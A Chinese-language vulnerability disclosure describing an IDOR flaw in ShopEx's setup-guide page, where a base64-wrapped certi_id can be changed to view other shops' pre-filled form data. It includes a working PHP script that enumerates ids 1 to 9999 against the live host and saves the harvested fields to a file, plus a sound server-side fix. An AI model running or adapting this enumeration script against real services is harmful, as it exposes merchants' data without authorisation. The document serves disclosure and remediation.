简要描述:
ShopEx 某接口缺陷，可遍历所有使用 ShopEx 程序的网站
详细说明:
问题出现在 ShopEx 网店使用向导页面（guide.ecos.shopex.cn/step2.php）。
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"} ——certi_id 只是被 base64 包裹的明文 ID，客户端可以任意改写。
接口没有校验 certi_id 与当前调用方的归属关系（典型的 IDOR），我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站，页面会回显对应站点预填的表单字段（见下方脚本对 input type="text" 的提取）。
<?php

// Sweep certificate ids 1..9999 in order; ShowshopExD (defined below)
// fetches the guide page for one id and records what it reveals.
$lastCertId = 9999;
foreach (range(1, $lastCertId) as $certId) {
    ShowshopExD($certId);
}
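/**
 * Probe one ShopEx certificate id through the guide "step2" page and record
 * whatever pre-filled form fields the page returns for it.
 *
 * The page takes a `refer` query parameter that is the base64 of a JSON
 * object {"certi_id":N,"callback_url":"..."}. Per the write-up, nothing binds
 * certi_id to the caller, so changing N yields the form of another
 * installation. When the response echoes our refer token back, every
 * <input type="text"> is printed as "name:value" and appended to c:/shopEx.txt.
 *
 * @param int|string $cid Certificate id to probe (coerced with intval()).
 * @return void
 */
function ShowshopExD($cid)
{
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';
    // Same payload shape the real page uses; callback_url is a throwaway host.
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');

    $ch = curl_init($endpoint . '?refer=' . $refer);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // Without timeouts a single hung connection stalls the whole 1..9999 sweep.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $result = curl_exec($ch);
    curl_close($ch);

    // curl_exec() returns false on transport failure; the original passed that
    // straight into mb_convert_encoding()/strpos() and silently matched nothing.
    if ($result !== false) {
        // Convert before matching so the dumped values read correctly on the
        // GB2312 console this script was written for.
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");

        // A bare truthy strpos() would miss a match at offset 0; test for false.
        if (strpos($result, $refer) !== false) {
            $fp = fopen("c:/shopEx.txt", 'ab'); // append; false if the path is unwritable
            foreach (shopex_extract_text_inputs($result) as $line) {
                echo $line;
                if ($fp !== false) {
                    fwrite($fp, $line, strlen($line));
                }
            }
            echo '--------------------------------' . "\r\n";
            if ($fp !== false) {
                fclose($fp);
            }
        }
    }

    flush();
}

/**
 * Pull "name:value\r\n" lines out of every <input type="text" ... /> in $html.
 *
 * Inputs whose attribute string does not contain name="..." followed by
 * value="..." are skipped, instead of emitting an empty ":" line with
 * undefined-offset notices as the original loop did.
 *
 * @param string $html Page body (already in the desired output encoding).
 * @return string[] One "name:value\r\n" entry per matching input, in page order.
 */
function shopex_extract_text_inputs($html)
{
    $lines = array();
    preg_match_all('/<input\stype="text"(.*?)\/>/', $html, $inputs);
    foreach ($inputs[1] as $attrs) {
        // Only the first name/value pair of each input was ever used.
        if (preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $m)) {
            $lines[] = $m[1] . ':' . $m[3] . "\r\n";
        }
    }
    return $lines;
}
?>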
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议：把 refer 换成其他加密方式只能提高遍历成本，并不能修掉问题的根源——certi_id 是客户端可控的参数。根本修复是在服务端校验 certi_id 与当前调用方（会话/商户）的归属关系，或改用服务端签发、不可预测且绑定调用方的令牌，而不是直接信任客户端传入的 ID。